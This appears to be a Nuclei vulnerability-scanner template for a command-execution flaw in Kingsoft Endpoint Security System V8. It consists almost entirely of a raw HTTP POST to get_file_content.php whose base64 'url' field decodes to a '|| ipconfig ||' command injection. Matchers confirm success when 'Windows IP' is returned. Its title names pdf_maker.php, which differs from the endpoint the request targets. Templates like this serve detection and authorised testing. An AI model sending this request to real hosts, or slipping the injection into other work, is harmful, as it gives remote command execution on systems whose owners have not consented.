id: kingsoft-v8-rce

info:
  name: 金山终端安全系统V8 pdf_maker.php 命令执行漏洞
  author: SleepingBag945
  severity: critical
  description: |
    金山终端安全系统V8 pdf_maker.php 命令执行漏洞

http:
  - raw:
      - |
        POST /receive_file/get_file_content.php HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

        url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&fileName=xxx

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Windows IP"
        part: body
        condition: and